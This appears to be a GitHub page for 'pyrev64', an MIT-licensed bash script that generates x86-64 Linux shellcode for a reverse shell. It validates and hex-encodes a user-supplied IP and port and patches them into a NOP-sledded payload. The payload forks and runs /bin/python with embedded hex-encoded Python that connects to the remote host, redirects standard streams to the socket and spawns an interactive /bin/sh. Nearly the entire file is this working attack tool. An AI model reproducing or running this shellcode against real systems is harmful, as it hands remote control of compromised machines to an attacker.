-
-
Notifications
You must be signed in to change notification settings - Fork 5
/
pyrev64
61 lines (50 loc) · 5.59 KB
/
pyrev64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/bin/bash
# drx - MIT License - Copyright 2020
# David Reguera Garcia aka Dreg - dreg@fr33project.org
# -
# http://github.com/David-Reguera-Garcia-Dreg/ - http://www.fr33project.org/
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
IP="${1:-127.0.0.1}"
PORT="${2:-9999}"
# Validate and encode IP hacky way
while read -d. n
do
if [ -n "$n" -a "$n" -ge 0 -a "$n" -le 255 ] 2> /dev/null
then
ip_hex="$ip_hex"$(h=$(printf '%02X' "$n"); printf '\\\\x%x\\\\x%x' "'${h:0:1}" "'${h:1:1}")
fi
done < <(echo "$IP".)
if [ ${#ip_hex} -ne 40 ]
then
echo "invalid ip" >&2
exit 1
fi
# Validate and encode Port
case "$PORT" in
[1-9][0-9][0-9][0-9])
;;
*)
echo "port must be in range 1000-9999" >&2
exit 1
;;
esac
while read -n1 c
do
port_hex="$port_hex\\\\x3$c"
done < <(echo -n "$PORT")
# Shellcode fun here
echo -n "\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xb8\\x39\\x00\\x00\\x00\\x0f\\x05\\x48\\x83\\xf8\\x00\\x74\\x25\\x48\\x89\\xc7\\xbe\\x00\\x00\\x00\\x00\\xba\\x00\\x00\\x00\\x00\\x41\\xba\\x00\\x00\\x00\\x00\\x41\\xb8\\x00\\x00\\x00\\x00\\xb8\\x3d\\x00\\x00\\x00\\x0f\\x05\\xe9\\x5f\\x02\\x00\\x00\\x6a\\x00\\xe8\\x0d\\x02\\x00\\x00\\x65\\x78\\x65\\x63\\x28\\x22\\x22\\x22\\x0a\\x69\\x6d\\x70\\x6f\\x72\\x74\\x20\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2c\\x73\\x75\\x62\\x70\\x72\\x6f\\x63\\x65\\x73\\x73\\x2c\\x6f\\x73\\x2c\\x73\\x79\\x73\\x0a\\x0a\\x70\\x69\\x64\\x72\\x67\\x20\\x3d\\x20\\x6f\\x73\\x2e\\x66\\x6f\\x72\\x6b\\x28\\x29\\x0a\\x69\\x66\\x20\\x70\\x69\\x64\\x72\\x67\\x20\\x3e\\x20\\x30\\x3a\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x79\\x73\\x2e\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x63\\x68\\x64\\x69\\x72\\x28\\x22\\x2f\\x22\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x73\\x65\\x74\\x73\\x69\\x64\\x28\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x75\\x6d\\x61\\x73\\x6b\\x28\\x30\\x29\\x0a\\x0a\\x64\\x72\\x67\\x70\\x69\\x64\\x20\\x3d\\x20\\x6f\\x73\\x2e\\x66\\x6f\\x72\\x6b\\x28\\x29\\x0a\\x69\\x66\\x20\\x64\\x72\\x67\\x70\\x69\\x64\\x20\\x3e\\x20\\x30\\x3a\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x79\\x73\\x2e\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x6f\\x75\\x74\\x2e\\x66\\x6c\\x75\\x73\\x68\\x28\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x65\\x72\\x72\\x2e\\x66\\x6c\\x75\\x73\\x68\\x28\\x29\\x0a\\x0a\\x66\\x64\\x72\\x65\\x67\\x20\\x3d\\x20\\x6f\\x70\\x65\\x6e\\x28\\x22\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x22\\x2c\\x20\\x22\\x77\\x22\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x6f\\x75\\x74\\x20\\x3d\\x20\\x66\\x64\\x72\\x65\\x67\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x65\\x72\\x72\\x20\\x3d\\x20\\x66\\x64\\x72\\x65\\x67\\x0a\\x0a\\x73\\x64\\x72\\x65\\x67\\x73\\x3d\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x41\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x53\\x4f\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x29\\x0a\\x0a\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28\\x28\\x73\\x74\\x72\\x28\\x30\\x78\\x37\\x66\\x30\\x30\\x30\\x30\\x30\\x31\\x29\\x2c\\x39\\x39\\x39\\x39\\x29\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x30\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x31\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x32\\x29\\x0a\\x0a\\x70\\x3d\\x73\\x75\\x62\\x70\\x72\\x6f\\x63\\x65\\x73\\x73\\x2e\\x63\\x61\\x6c\\x6c\\x28\\x5b\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x22\\x2c\\x22\\x2d\\x69\\x22\\x5d\\x29\\x0a\\x22\\x22\\x22\\x29\\x00\\xe8\\x03\\x00\\x00\\x00\\x2d\\x63\\x00\\xe8\\x0c\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x70\\x79\\x74\\x68\\x6f\\x6e\\x00\\x48\\x8d\\x05\\x21\\x00\\x00\\x00\\x50\\x48\\x31\\xd2\\x48\\x89\\xe6\\x48\\x8d\\x3d\\x13\\x00\\x00\\x00\\xb8\\x3b\\x00\\x00\\x00\\x0f\\x05\\xb8\\x3c\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\x0f\\x05\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90" | sed 's/\\x39\\x39\\x39\\x39/'"$port_hex"'/g' | sed 's/\\x37\\x66\\x30\\x30\\x30\\x30\\x30\\x31/'"$ip_hex"'/g'